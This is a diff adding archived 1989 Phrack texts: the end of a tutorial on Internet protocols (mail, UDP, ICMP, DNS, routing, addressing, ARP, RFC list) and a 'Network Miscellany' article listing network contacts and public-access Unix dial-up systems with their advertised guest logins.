+themselves simply allow the mail program on one end to tell the mail server the
+information it needs to know in order to deliver the message.  In this case,
+the mail server could get the information by looking at the message itself.
+
+Every session must begin with a HELO, which gives the name of the system that
+initiated the connection.  Then the sender and recipients are specified.  There
+can be more than one RCPT command, if there are several recipients.  Finally
+the data itself is sent.  Note that the text of the message is terminated by a
+line containing just a period, but if such a line appears in the message, the
+period is doubled.  After the message is accepted, the sender can send another
+message, or terminate the session as in the example above.
+
+Generally, there is a pattern to the response numbers.  The protocol defines
+the specific set of responses that can be sent as answers to any given command.
+However programs that don't want to analyze them in detail can just look at the
+first digit.  In general, responses that begin with a 2 indicate success.
+Those that begin with 3 indicate that some further action is needed, as shown
+above.  4 and 5 indicate errors.  4 is a "temporary" error, such as a disk
+filling.  The message should be saved, and tried again later.  5 is a permanent
+error, such as a non-existent recipient.  The message should be returned to the
+sender with an error message.
+
+For more details about the protocols mentioned in this section, see RFCs
+821/822 for mail, RFC 959 for file transfer, and RFCs 854/855 for remote
+logins.  For the well-known port numbers, see the current edition of Assigned
+Numbers, and possibly RFC 814.
+
+
+Protocols Other Than TCP:  UDP and ICMP
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Thus far only connections that use TCP have been described.  Remember that TCP
+is responsible for breaking up messages into datagrams, and reassembling them
+properly.  However in many applications, there are messages that will always
+fit in a single datagram.  An example is name lookup.  When a user attempts to
+make a connection to another system, he will generally specify the system by
+name, rather than Internet address.  His system has to translate that name to
+an address before it can do anything.  Generally, only a few systems have the
+database used to translate names to addresses.  So the user's system will want
+to send a query to one of the systems that has the database.
+
+This query is going to be very short.  It will certainly fit in one datagram.
+So will the answer.  Thus it seems silly to use TCP.  Of course TCP does more
+than just break things up into datagrams.  It also makes sure that the data
+arrives, resending datagrams where necessary.  But for a question that fits in
+a single datagram, all of the complexity of TCP is not needed.  If there is not
+an answer after a few seconds, you can just ask again.  For applications like
+this, there are alternatives to TCP.
+
+The most common alternative is UDP ("user datagram protocol").  UDP is designed
+for applications where you don't need to put sequences of datagrams together.
+It fits into the system much like TCP.  There is a UDP header.  The network
+software puts the UDP header on the front of your data, just as it would put a
+TCP header on the front of your data.  Then UDP sends the data to IP, which
+adds the IP header, putting UDP's protocol number in the protocol field instead
+of TCP's protocol number.
+
+UDP doesn't do as much as TCP does.  It does not split data into multiple
+datagrams and it does not keep track of what it has sent so it can resend if
+necessary.  About all that UDP provides is port numbers so that several
+programs can use UDP at once.  UDP port numbers are used just like TCP port
+numbers.  There are well-known port numbers for servers that use UDP.
+
+The UDP header is shorter than a TCP header.  It still has source and
+destination port numbers, and a checksum, but that's about it.  UDP is used by
+the protocols that handle name lookups (see IEN 116, RFC 882, and RFC 883) and
+a number of similar protocols.
+
+Another alternative protocol is ICMP ("Internet control message protocol").
+ICMP is used for error messages, and other messages intended for the TCP/IP
+software itself, rather than any particular user program.  For example, if you
+attempt to connect to a host, your system may get back an ICMP message saying
+"host unreachable."  ICMP can also be used to find out some information about
+the network.  See RFC 792 for details of ICMP.
+
+ICMP is similar to UDP, in that it handles messages that fit in one datagram.
+However it is even simpler than UDP.  It does not even have port numbers in its
+header.  Since all ICMP messages are interpreted by the network software
+itself, no port numbers are needed to say where an ICMP message is supposed to
+go.
+
+
+Keeping Track Of Names And Information:  The Domain System
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+As we indicated earlier, the network software generally needs a 32-bit Internet
+address in order to open a connection or send a datagram.  However users prefer
+to deal with computer names rather than numbers.  Thus there is a database that
+allows the software to look up a name and find the corresponding number.
+
+When the Internet was small, this was easy.  Each system would have a file that
+listed all of the other systems, giving both their name and number.  There are
+now too many computers for this approach to be practical.  Thus these files
+have been replaced by a set of name servers that keep track of host names and
+the corresponding Internet addresses.  (In fact these servers are somewhat more
+general than that.  This is just one kind of information stored in the domain
+system.)  A set of interlocking servers are used rather than a single central
+one.
+
+There are now so many different institutions connected to the Internet that it
+would be impractical for them to notify a central authority whenever they
+installed or moved a computer.  Thus naming authority is delegated to
+individual institutions.  The name servers form a tree, corresponding to
+institutional structure. The names themselves follow a similar structure.  A
+typical example is the name BORAX.LCS.MIT.EDU.  This is a computer at the
+Laboratory for Computer Science (LCS) at MIT.  In order to find its Internet
+address, you might potentially have to consult 4 different servers.
+
+First, you would ask a central server (called the root) where the EDU server
+is.  EDU is a server that keeps track of educational institutions.  The root
+server would give you the names and Internet addresses of several servers for
+EDU.  You would then ask EDU where the server for MIT is.  It would give you
+names and Internet addresses of several servers for MIT.  Then you would ask
+MIT where the server for LCS is, and finally you would ask one of the LCS
+servers about BORAX.  The final result would be the Internet address for
+BORAX.LCS.MIT.EDU.  Each of these levels is referred to as a "domain."  The
+entire name, BORAX.LCS.MIT.EDU, is called a "domain name."  (So are the names
+of the higher-level domains, such as LCS.MIT.EDU, MIT.EDU, and EDU.)
+
+Fortunately, you don't really have to go through all of this most of the time.
+First of all, the root name servers also happen to be the name servers for the
+top-level domains such as EDU.  Thus a single query to a root server will get
+you to MIT.  Second, software generally remembers answers that it got before.
+So once we look up a name at LCS.MIT.EDU, our software remembers where to find
+servers for LCS.MIT.EDU, MIT.EDU, and EDU.  It also remembers the translation
+of BORAX.LCS.MIT.EDU.  Each of these pieces of information has a "time to live"
+associated with it.  Typically this is a few days.  After that, the information
+expires and has to be looked up again.  This allows institutions to change
+things.
+
+The domain system is not limited to finding out Internet addresses.  Each
+domain name is a node in a database.  The node can have records that define a
+number of different properties.  Examples are Internet address, computer type,
+and a list of services provided by a computer.  A program can ask for a
+specific piece of information, or all information about a given name.  It is
+possible for a node in the database to be marked as an "alias" (or nickname)
+for another node.  It is also possible to use the domain system to store
+information about users, mailing lists, or other objects.
+
+There is an Internet standard defining the operation of these databases as well
+as the protocols used to make queries of them.  Every network utility has to be
+able to make such queries since this is now the official way to evaluate host
+names.  Generally utilities will talk to a server on their own system.  This
+server will take care of contacting the other servers for them.  This keeps
+down the amount of code that has to be in each application program.
+
+The domain system is particularly important for handling computer mail.  There
+are entry types to define what computer handles mail for a given name to
+specify where an individual is to receive mail and to define mailing lists.
+
+See RFCs 882, 883, and 973 for specifications of the domain system.  RFC 974
+defines the use of the domain system in sending mail.
+
+Routing
+~~~~~~~
+The task of finding how to get a datagram to its destination is referred to as
+"routing."  Many of the details depend upon the particular implementation.
+However some general things can be said.
+
+It is necessary to understand the model on which IP is based.  IP assumes that
+a system is attached to some local network.  It is assumed that the system can
+send datagrams to any other system on its own network.  (In the case of
+Ethernet, it simply finds the Ethernet address of the destination system, and
+puts the datagram out on the Ethernet.)  The problem comes when a system is
+asked to send a datagram to a system on a different network.  This problem is
+handled by gateways.
+
+A gateway is a system that connects a network with one or more other networks.
+Gateways are often normal computers that happen to have more than one network
+interface.  The software on a machine must be set up so that it will forward
+datagrams from one network to the other.  That is, if a machine on network
+128.6.4 sends a datagram to the gateway, and the datagram is addressed to a
+machine on network 128.6.3, the gateway will forward the datagram to the
+destination.  Major communications centers often have gateways that connect a
+number of different networks.
+
+Routing in IP is based entirely upon the network number of the destination
+address.  Each computer has a table of network numbers.  For each network
+number, a gateway is listed.  This is the gateway to be used to get to that
+network.  The gateway does not have to connect directly to the network, it just
+has to be the best place to go to get there.
+
+When a computer wants to send a datagram, it first checks to see if the
+destination address is on the system's own local network.  If so, the datagram
+can be sent directly.  Otherwise, the system expects to find an entry for the
+network that the destination address is on.  The datagram is sent to the
+gateway listed in that entry.  This table can get quite big.  For example, the
+Internet now includes several hundred individual networks.  Thus various
+strategies have been developed to reduce the size of the routing table.  One
+strategy is to depend upon "default routes."  There is often only one gateway
+out of a network.
+
+This gateway might connect a local Ethernet to a campus-wide backbone network.
+In that case, it is not neccessary to have a separate entry for every network
+in the world.  That gateway is simply defined as a "default."  When no specific
+route is found for a datagram, the datagram is sent to the default gateway.  A
+default gateway can even be used when there are several gateways on a network.
+There are provisions for gateways to send a message saying "I'm not the best
+gateway -- use this one instead."  (The message is sent via ICMP.  See RFC
+792.)  Most network software is designed to use these messages to add entries
+to their routing tables.  Suppose network 128.6.4 has two gateways, 128.6.4.59
+and 128.6.4.1.  128.6.4.59 leads to several other internal Rutgers networks.
+128.6.4.1 leads indirectly to the NSFnet.  Suppose 128.6.4.59 is set as a
+default gateway, and there are no other routing table entries.  Now what
+happens when you need to send a datagram to MIT?  MIT is network 18.  Since
+there is no entry for network 18, the datagram will be sent to the default,
+128.6.4.59.  This gateway is the wrong one.  So it will forward the datagram to
+128.6.4.1.  It will also send back an error saying in effect:  "to get to
+network 18, use 128.6.4.1."  The software will then add an entry to the routing
+table.  Any future datagrams to MIT will then go directly to 128.6.4.1.  (The
+error message is sent using the ICMP protocol.  The message type is called
+"ICMP redirect.")
+
+Most IP experts recommend that individual computers should not try to keep
+track of the entire network.  Instead, they should start with default gateways
+and let the gateways tell them the routes as just described.  However this
+doesn't say how the gateways should find out about the routes.  The gateways
+can't depend upon this strategy.  They have to have fairly complete routing
+tables.  For this, some sort of routing protocol is needed.  A routing protocol
+is simply a technique for the gateways to find each other and keep up to date
+about the best way to get to every network.  RFC 1009 contains a review of
+gateway design and routing.
+
+
+Details About Internet Addresses:  Subnets And Broadcasting
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Internet addresses are 32-bit numbers, normally written as 4 octets (in
+decimal), e.g. 128.6.4.7.  There are actually 3 different types of address.
+The problem is that the address has to indicate both the network and the host
+within the network.  It was felt that eventually there would be lots of
+networks.  Many of them would be small, but probably 24 bits would be needed to
+represent all the IP networks.  It was also felt that some very big networks
+might need 24 bits to represent all of their hosts.  This would seem to lead to
+48 bit addresses.  But the designers really wanted to use 32 bit addresses.  So
+they adopted a kludge.  The assumption is that most of the networks will be
+small.  So they set up three different ranges of address.
+
+Addresses beginning with 1 to 126 use only the first octet for the network
+number.  The other three octets are available for the host number.  Thus 24
+bits are available for hosts.  These numbers are used for large networks, but
+there can only be 126 of these.  The ARPAnet is one and there are a few large
+commercial networks.  But few normal organizations get one of these "class A"
+addresses.
+
+For normal large organizations, "class B" addresses are used.  Class B
+addresses use the first two octets for the network number.  Thus network
+numbers are 128.1 through 191.254.  (0 and 255 are avoided for reasons to be
+explained below.  Addresses beginning with 127 are also avoided because they
+are used by some systems for special purposes.)  The last two octets are
+available for host addesses, giving 16 bits of host address.  This allows for
+64516 computers, which should be enough for most organizations.  Finally, class
+C addresses use three octets in the range 192.1.1 to 223.254.254.  These allow
+only 254 hosts on each network, but there can be lots of these networks.
+Addresses above 223 are reserved for future use as class D and E (which are
+currently not defined).
+
+0 and 255 have special meanings.  0 is reserved for machines that do not know
+their address.  In certain circumstances it is possible for a machine not to
+know the number of the network it is on, or even its own host address.  For
+example, 0.0.0.23 would be a machine that knew it was host number 23, but
+didn't know on what network.
+
+255 is used for "broadcast."  A broadcast is a message that you want every
+system on the network to see.  Broadcasts are used in some situations where you
+don't know who to talk to.  For example, suppose you need to look up a host
+name and get its Internet address.  Sometimes you don't know the address of the
+nearest name server.  In that case, you might send the request as a broadcast.
+There are also cases where a number of systems are interested in information.
+It is then less expensive to send a single broadcast than to send datagrams
+individually to each host that is interested in the information.  In order to
+send a broadcast, you use an address that is made by using your network
+address, with all ones in the part of the address where the host number goes.
+For example, if you are on network 128.6.4, you would use 128.6.4.255 for
+broadcasts.  How this is actually implemented depends upon the medium.  It is
+not possible to send broadcasts on the ARPAnet, or on point to point lines, but
+it is possible on an Ethernet.  If you use an Ethernet address with all its
+bits on (all ones), every machine on the Ethernet is supposed to look at that
+datagram.
+
+Because 0 and 255 are used for unknown and broadcast addresses, normal hosts
+should never be given addresses containing 0 or 255.  Addresses should never
+begin with 0, 127, or any number above 223.
+
+
+Datagram Fragmentation And Reassembly
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+TCP/IP is designed for use with many different kinds of networks.
+Unfortunately, network designers do not agree about how big packets can be.
+Ethernet packets can be 1500 octets long.  ARPAnet packets have a maximum of
+around 1000 octets.  Some very fast networks have much larger packet sizes.
+You might think that IP should simply settle on the smallest possible size, but
+this would cause serious performance problems.  When transferring large files,
+big packets are far more efficient than small ones.  So it is best to be able
+to use the largest packet size possible, but it is also necessary to be able to
+handle networks with small limits.  There are two provisions for this.
+
+TCP has the ability to "negotiate" about datagram size.  When a TCP connection
+first opens, both ends can send the maximum datagram size they can handle.  The
+smaller of these numbers is used for the rest of the connection.  This allows
+two implementations that can handle big datagrams to use them, but also lets
+them talk to implementations that cannot handle them.  This does not completely
+solve the problem.  The most serious problem is that the two ends do not
+necessarily know about all of the steps in between.  For this reason, there are
+provisions to split datagrams up into pieces.  This is referred to as
+"fragmentation."
+
+The IP header contains fields indicating that a datagram has been split and
+enough information to let the pieces be put back together.  If a gateway
+connects an Ethernet to the Arpanet, it must be prepared to take 1500-octet
+Ethernet packets and split them into pieces that will fit on the Arpanet.
+Furthermore, every host implementation of TCP/IP must be prepared to accept
+pieces and put them back together.  This is referred to as "reassembly."
+
+TCP/IP implementations differ in the approach they take to deciding on datagram
+size.  It is fairly common for implementations to use 576-byte datagrams
+whenever they can't verify that the entire path is able to handle larger
+packets.  This rather conservative strategy is used because of the number of
+implementations with bugs in the code to reassemble fragments.  Implementors
+often try to avoid ever having fragmentation occur.  Different implementors
+take different approaches to deciding when it is safe to use large datagrams.
+Some use them only for the local network.  Others will use them for any network
+on the same campus.  576 bytes is a "safe" size which every implementation must
+support.
+
+Ethernet Encapsulation:  ARP
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In Part One of Introduction to the Internet Protocols (Phrack Inc., Volume
+Three, Issue 28, File #3 of 12) there was a brief description about what IP
+datagrams look like on an Ethernet.  The discription showed the Ethernet header
+and checksum, but it left one hole:  It did not say how to figure out what
+Ethernet address to use when you want to talk to a given Internet address.
+There is a separate protocol for this called ARP ("address resolution
+protocol") and it is not an IP protocal as ARP datagrams do not have IP
+headers.
+
+Suppose you are on system 128.6.4.194 and you want to connect to system
+128.6.4.7.  Your system will first verify that 128.6.4.7 is on the same
+network, so it can talk directly via Ethernet.  Then it will look up 128.6.4.7
+in its ARP table to see if it already knows the Ethernet address.  If so, it
+will stick on an Ethernet header and send the packet.  Now suppose this system
+is not in the ARP table.  There is no way to send the packet because you need
+the Ethernet address.  So it uses the ARP protocol to send an ARP request.
+Essentially an ARP request says "I need the Ethernet address for 128.6.4.7".
+Every system listens to ARP requests.  When a system sees an ARP request for
+itself, it is required to respond.  So 128.6.4.7 will see the request and will
+respond with an ARP reply saying in effect "128.6.4.7 is 8:0:20:1:56:34".  Your
+system will save this information in its ARP table so future packets will go
+directly.
+
+ARP requests must be sent as "broadcasts."  There is no way that an ARP request
+can be sent directly to the right system because the whole reason for sending
+an ARP request is that you do not know the Ethernet address.  So an Ethernet
+address of all ones is used, i.e. ff:ff:ff:ff:ff:ff.  By convention, every
+machine on the Ethernet is required to pay attention to packets with this as an
+address.  So every system sees every ARP requests.  They all look to see
+whether the request is for their own address.  If so, they respond.  If not,
+they could just ignore it, although some hosts will use ARP requests to update
+their knowledge about other hosts on the network, even if the request is not
+for them.  Packets whose IP address indicates broadcast (e.g. 255.255.255.255
+or 128.6.4.255) are also sent with an Ethernet address that is all ones.
+
+
+Getting More Information
+~~~~~~~~~~~~~~~~~~~~~~~~
+This directory contains documents describing the major protocols.  There are
+hundreds of documents, so I have chosen the ones that seem most important.
+Internet standards are called RFCs (Request for Comments).  A proposed standard
+is initially issued as a proposal, and given an RFC number.  When it is finally
+accepted, it is added to Official Internet Protocols, but it is still referred
+to by the RFC number.  I have also included two IENs (Internet Engineering
+Notes).  IENs used to be a separate classification for more informal
+documents, but this classification no longer exists and RFCs are now used for
+all official Internet documents with a mailing list being used for more
+informal reports.
+
+The convention is that whenever an RFC is revised, the revised version gets a
+new number.  This is fine for most purposes, but it causes problems with two
+documents:  Assigned Numbers and Official Internet Protocols.  These documents
+are being revised all the time and the RFC number keeps changing.  You will
+have to look in rfc-index.txt to find the number of the latest edition.  Anyone
+who is seriously interested in TCP/IP should read the RFC describing IP (791).
+RFC 1009 is also useful as it is a specification for gateways to be used by
+NSFnet and it contains an overview of a lot of the TCP/IP technology.
+
+Here is a list of the documents you might want:
+
+     rfc-index List of all RFCs
+     rfc1012   Somewhat fuller list of all RFCs
+     rfc1011   Official Protocols.  It's useful to scan this to see what tasks
+               protocols have been built for.  This defines which RFCs are
+               actual standards, as opposed to requests for comments.
+     rfc1010   Assigned Numbers.  If you are working with TCP/IP, you will
+               probably want a hardcopy of this as a reference.  It lists all
+               the offically defined well-known ports and lots of other
+               things.
+     rfc1009   NSFnet gateway specifications.  A good overview of IP routing
+               and gateway technology.
+     rfc1001/2 NetBIOS:  Networking for PCs
+     rfc973    Update on domains
+     rfc959    FTP (file transfer)
+     rfc950    Subnets
+     rfc937    POP2:  Protocol for reading mail on PCs
+     rfc894    How IP is to be put on Ethernet, see also rfc825
+     rfc882/3  Domains (the database used to go from host names to Internet
+               address and back -- also used to handle UUCP these days).  See
+               also rfc973
+     rfc854/5  Telnet - Protocol for remote logins
+     rfc826    ARP - Protocol for finding out Ethernet addresses
+     rfc821/2  Mail
+     rfc814    Names and ports - General concepts behind well-known ports
+     rfc793    TCP
+     rfc792    ICMP
+     rfc791    IP
+     rfc768    UDP
+     rip.doc   Details of the most commonly-used routing protocol
+     ien-116   Old name server (still needed by several kinds of systems)
+     ien-48    The Catenet model, general description of the philosophy behind
+               TCP/IP
+
+The following documents are somewhat more specialized.
+
+     rfc813    Window and acknowledgement strategies in TCP
+     rfc815    Datagram reassembly techniques
+     rfc816    Fault isolation and resolution techniques
+     rfc817    Modularity and efficiency in implementation
+     rfc879    The maximum segment size option in TCP
+     rfc896    Congestion control
+     rfc827,888,904,975,985    EGP and related issues
+
+The most important RFCs have been collected into a three-volume set, the DDN
+Protocol Handbook.  It is available from the DDN Network Information Center at
+SRI International.  You should be able to get them via anonymous FTP from
+SRI-NIC.ARPA.  The file names are:
+
+   RFCs:
+     rfc:rfc-index.txt
+     rfc:rfcxxx.txt
+   IENs:
+     ien:ien-index.txt
+     ien:ien-xxx.txt
+
+ Sites with access to UUCP, but not FTP may be able to retreive them via
+ UUCP from UUCP host rutgers.  The file names would be
+
+   RFCs:
+     /topaz/pub/pub/tcp-ip-docs/rfc-index.txt
+     /topaz/pub/pub/tcp-ip-docs/rfcxxx.txt
+   IENs:
+     /topaz/pub/pub/tcp-ip-docs/ien-index.txt
+     /topaz/pub/pub/tcp-ip-docs/ien-xxx.txt
+
+                        >--------=====END=====--------<
diff --git a/phrack29/4.txt b/phrack29/4.txt
new file mode 100644
index 0000000..d600a5a
--- /dev/null
+++ b/phrack29/4.txt
@@ -0,0 +1,637 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 29, File #4 of 12
+
+                             Network Miscellany II
+                             ~~~~~~~~~~~~~~~~~~~~~
+                                 by Taran King
+
+                               November 17, 1989
+
+
+BROADCASTING NETWORKS
+~~~~~~~~~~~~~~~~~~~~~
+Although these articles discuss things about communicating through computer
+networks, there are ways to contact broadcasting networks via the nets.  The
+Public Broadcasting Service (PBS) has their own UUCP node:
+
+Public Broadcasting Service (PBS)
+UUCP Node name:  pbs
+Node contact:  pbs!postmaster (Senton R. Droppers)
+Telephone number:  (703) 739-5089
+
+There are also a number of radio stations that can be contacted via Fidonet:
+
+KFCF
+Fresno, CA
+Contact:  Randy.Stover@f42.n205.z1.fidonet.org
+
+KKSF
+San Fransisco, CA
+Contact:  Tim.Pozar@fidogate.fidonet.org
+
+KKDA
+Dallas, TX
+Contact:  Gerry.Dalton@f1213.n124.z1.fidonet.org
+
+
+ECNCDC (BITNET)
+~~~~~~~~~~~~~~~
+Western Illinois University, Eastern Illinois University as well as the
+University of Northeastern Illinois, Chicago State University and Governors
+State University are part of the Educational Computing Network.  The
+Educational Computing Network is a service of the Board of Governors of State
+Colleges and Universities operating as a cooperative to supply mainframe
+academic computing resources to each of its members (ECN is strictly for
+academic use and does no administrative computing).  The cooperative effort of
+the members of the Educational Computing Network allows for more academic
+computing resources to be made available to the members than they could supply
+on their own.
+
+Each member institution of the Educational Computing Network has a unique
+letter for the first letter in all their user names.  The letters are:
+
+     Chicago State University            - B
+     Eastern Illinois University         - C
+     Governors State University          - G
+     Western Illinois University         - M
+     University of Northeastern Illinois - U
+
+Each member of ECN also has a person which is the interface between ECN and the
+university called their User Coordinator.  The User Coordinator's username
+consists of their school letter followed by UCM000 (the User Coordinator for
+WIU is MUCM000).
+
+For more information about the Educational Computing Network, contact
+XJJGUDE@ECNCDC.BITNET
+
+
+MCI MAIL
+~~~~~~~~
+If you read the first Network Miscellany article which appeared in Phrack 28,
+you may remember my mentioning CMR, the Commercial Mail Relay.  Unfortunately,
+due to its restrictions about who can use it (supposedly), it has potential to
+become a sticky situation if the user you are sending to no longer has his MCI
+Mail account or if you accidentally mistype the MCI Mail address.  But to save
+us from this potential problem, MCI Mail now has their own domain on the
+Internet, MCIMAIL.COM so mailing to userid@MCIMAIL.COM should work just as well
+as CMR without the risks of being yelled at (and possibly billed).
+
+
+PUBLIC ACCESS UNIXES
+~~~~~~~~~~~~~~~~~~~~
+Part of the problem with the whole idea of using the Wide Area Networks is
+access.  For those who are not enrolled in a university or cannot pull strings
+at their local business or college, the concept of communicating through the
+networks is useless besides thinking that it would be neat.  Thanks to Phil
+Eschallier, phil@lgnp1.UUCP or phil@LS.COM, you should now be able to get
+access to the Wide Area Networks via UUCP.  The following is a list of Public
+Access Unix systems taken from the Usenet Newsgroup pub.nixpub which Phil keeps
+up and there are two versions, both of which contain the same basic information
+but each has important information which the other does not necessarily have.
+I urge you to attempt to get on one of these systems and drop us a line over
+the networks.
+
+                              nixpub long listing
+      Open Access UNIX (*NIX) Sites [Fee / No Fee] for mapped sites only
+                             [ November 12, 1989 ]
+
+Systems listed (73):
+ [  agora, alphacm, althea, amazing, anet, attctc, bigtex, bucket, chariot  ]
+ [  chinet, cinnet, conexch, cpro, cruzio, dasys1, ddsw1, dhw68k, disk      ]
+ [  eklektik, esfenn, gensis, grebyn, i-core, igloo, jdyx, jolnet, lgnp1    ]
+ [  lilink, loft386, lunapark, m-net, madnix, magpie, marob, ncoast, netcom ]
+ [  nstar, nuchat, nucleus, oncoast, ozdaltx, pallas, pnet01, pnet02        ]
+ [  pnet51, point, polari, portal, raider, rpp386, rtmvax, sactoh0, sharks  ]
+ [  sir-alan, sixhub, stanton, stb, sugar, telly, tmsoft, tnl, turnkey      ]
+ [  ubbs-nh, usource, uuwest, vpnet, well, wet, wolves, world, wybbs        ]
+ [  xroads, ziebmef                                                         ]
+
+Last
+Contact
+Date   Telephone #    Sys-name    Location                Baud        Hours
+-----  ------------   --------    -----------             -------     -----
+
+08/89  201-846-2460^  althea      New Brunswick       NJ  3/12/24     24
+  AT&T 3B2/310 - Unix SVR3.1, no fee.  USENET, email, C development,
+  games.  Single line.
+  Contact: rjd@althea.UUCP (Robert Diamond)
+
+10/89  206-328-4944   polari      Seatle              WA  3/12        24
+  Equip ???;  8-lines, Trailblazer on 206-328-1468;  $30/year (flat rate);
+  Multi-user games, chat, full USENET.
+  Contact: uunet!microsoft!happym!polari!bruceki
+
+10/89  212-420-0527   magpie      NYC                 NY  3/12/24/96  24
+  ? - UNIX SYSV - 2, Magpie BBS, no fee, Authors: Magpie/UNIX,/MSDOS
+  two lines plus anonymous uucp: 212-677-9487 (9600 bps Telebit modem)
+  NOTE: 9487 reserved for registered Magpie sysops & anon uucp
+  Contact: Steve Manes, {rutgers|cmcl2|uunet}!hombre!magpie!manes
+
+10/89  212-675-7059   marob       NYC                 NY  3/12/24     24
+  386 SCO-XENIX 2.2, XBBS, magpie bbs, no fee, limit 60 min
+  Telebit Trailblazer (9600 PEP) only 212-675-8438
+  Contact:  {philabs|rutgers|cmcl2}!{phri|hombre}!marob!clifford
+
+05/89  212-879-9031^  dasys1      NYC                 NY  12/24       24
+  Unistride - SYS V, multiple lines, fee $5/mo  AKA Big Electric Cat
+  USENET, games, multi-user chat, email, login: new, passwd: new
+  Contact: ...!rutgers!cmcl2!rsweeney or rsweeney@dasys1.UUCP
+
+09/89  213-376-5714^  pnet02      Redondo Bch         CA  3/12/24     24
+  XENIX (also 213-374-7404) no fee, 90 min limit, login: pnet id: new
+  some USENET, net-work e-mail, multi-threaded conferencing
+
+09/89  213-397-3137^  stb         Santa Monica        CA  3/12/24     24
+  AT&T 3b1;  BBS and shell access;  uucp-anon: ogin: uucp NO PASSWD
+  3 line on rotory -3137 2400 baud.
+
+03/88  213-459-5891   amazing     Pacific Palisades   CA  3/12/24     24
+  AMT 286 - Microport  David's Amazing BBS  Fee $7.50/month;$35/6;$60/year
+  5 lines on rotary; Unique original software with conferencing, electronic
+  bar, matchmaking, no file up/downloading
+
+07/88  214-247-2367   ozdaltx     Dallas              TX  3/12/24     24
+  INTEC/SCO XENIX 2.2.1, OZ BBS, Membership only adult BBS, fee $40
+  year. Multiple lines.  Closed system, carries limited USENET
+  newsgroups. Login: guest (no PW).  Voice verification on all new users.
+
+07/89  214-824-7881   attctc      Dallas              TX  3/12/24     24
+  3b2/522 - UNIX, no fee, various time limits, 8 lines 2.8 GB online
+  uucp-anon --> 214-741-2130  ogin: uupdsrc word: Public
+  uucp-anon info in: /bbsys4/README     (Formerly node name killer)
+
+11/89  215-348-9727   lgnp1       Doylestown          PA  3/12/24/96  24
+  SCO-XENIX -- Telebit access.  Shell accounts by appointment only;  Fee;
+  Services include E-mail, USENET News;  --Home of the Nixpub lists--
+  Contact: phil@ls.com.
+    anon-uucp: nuucp  NO PWD  (download /usr/spool/uucppublic/nixpub
+                                     or /usr/spool/uucppublic/nixpub.short)
+
+09/89  216-582-2441   ncoast      Cleveland           OH  12/24/96     24
+  80386 Mylex, SCO Xenix;  600 meg. storage;  XBBS and Shell;  USENET
+  (newsfeeds available), E-Mail; donations requested; login as "bbs"
+  for BBS and "makeuser" for new users.
+  Telebit used on 216-237-5486.
+
+08/88  217-529-3223   pallas      Springfield         IL  3/12/24     24
+  Convrgnt Minifrme, multiple lines, 200 meg Minnie bbs $25 donation
+
+10/89  219-289-0286   nstar       South Bend          IN  3/12/24/96  24
+  Equip ???, UNIX 3.2; 300 Meg On-line; 4 lines at 9600 baud --
+  (listed) - Hayes V-Series, (287-9020) - HST, (289-3745) - PEP;
+  Full USENET, AKCS Software; Contact ..!iuvax!ndcheg!ndmath!nstar!larry
+
+08/88  312-283-0559^  chinet      Chicago             IL  3/12/24     24
+  3b2/300 - SYS V 3.1, multiple lines, Picospan BBS, system & BBS free
+  Extra phone lines and usenet, $50/yr.
+
+10/89  312-338-0632^  point       Chicago             IL  3/12/24/96  24
+  North Shore / Rogers Park area of Chicago.  386 - ISC 2.01 (SysV3.2),
+  multiple lines, Telebit PEP on 338-3261, USRobotics HST on 338-1036,
+  AKCS bbs, some usenet conferences available.  200+ MB online storage.
+  Downloads, full usenet & shell access in the works.
+
+04/89  313-623-6309   nucleus     Clarkston           MI  12/24       24
+  286 - Unix System V, no fee. Shell access, full usenet access, online games,
+  AKCS conferencing system, some public domain sources online, extensive tape
+  library of public domain source code
+
+02/88  313-994-6333   m-net       Ann Arbor           MI  3/12        24
+  Altos 68020 - SYS III, limits unstated, fee for extended service
+  Picospan conference system, multiple lines, 160 meg, packet radio
+
+08/89  313-996-4644^  anet        Ann Arbor           MI  3/12        24
+  Altos 68000 - Sys III, no limits, 1st month free, fees range up to $20/
+  month (negotiable), accepts equipment/software in lieu of fees, Picospan
+  conferencing, 120M, non-profit, user-supported, community-based, ideal
+  autodidact educational system.  Tax-deductible donations okay.
+
+08/89  314-474-4581   gensis      Columbia            MO  3/12/24/48/96  24
+  Gateway 386 system w/ SCO Xenix V/386, DataFlex, Oracle, CHARM, & VP/ix.
+  No fee.  Online gaming, game design, and (oddly enough) data base design
+  are the main focus.  Modem is Microcom MNP 6.
+
+10/89  404-321-5020^  jdyx        Atlanta             GA  12/24/96     24
+  386/ix 2.0.2.  XBBS. Usenet (alt, gnu, most comp and a few others) and
+  shell access.  Second line (2400 below) (404) 325-1719.  200+ meg current
+  Usenet and GNU sources.  Specializing in graphics and ray-tracing under
+  386/ix (with/with out X11).  Yearly fee for shell and/or downloads.
+  Telebit access.  Contact: ...gatech!emory!jdyx!tpf (Tom Friedel)
+
+05/88  407-380-6228   rtmvax      Orlando             FL  3/12/24     24
+  mVAX-I - Ultrix-32 V1.2  USENET & UUCP Email Gateway. XBBS front end for
+  new user subscribing. No Fees. Primary function is Technical exchange.
+  Contact: { cbosgd!codas, hoptoad!peora }!rtmvax!rob
+
+09/89  408-245-7726^  uuwest      Sunnyvale           CA  3/12/24     24
+  SCO-XENIX, Waffle. No fee, USENET news (news.*, music, comics, telecom, etc)
+  The Dark Side of the Moon BBS. This system has been in operation since 1985.
+  Login: new Contact: (UUCP) ames!uuwest!request (Domain) request@darkside.com
+
+04/88  408-247-4810   sharks      Santa Clara         CA  3/12        24
+  Altos 886/80/80  - XENIX 3.2f AKA: Shark's Head BBS,  BBCS Network
+  Multiple lines,no fee for non-members,members $25 year
+  Restricted sh access and UUCP/Usenet access for advanced members
+
+11/89  408-423-9995   cruzio      Santa Cruz          CA  12/24       24
+  Tandy 4000, Xenix 2.3.*, Caucus 3.*;  focus on Santa Cruz activity
+  (ie directory of community and goverment organizations, events, ...);
+  Multiple lines;  no shell; fee: $18/quarter.
+  Contact: ...!uunet!cruzio!chris
+
+10/89  408-725-0561^  portal      Cupertino           CA  3/12/24     24
+  Networked Suns (SunOS), multiple lines, Telenet access, no shell access
+  fees: $10/month + Telenet charges (if used) @ various rates/times
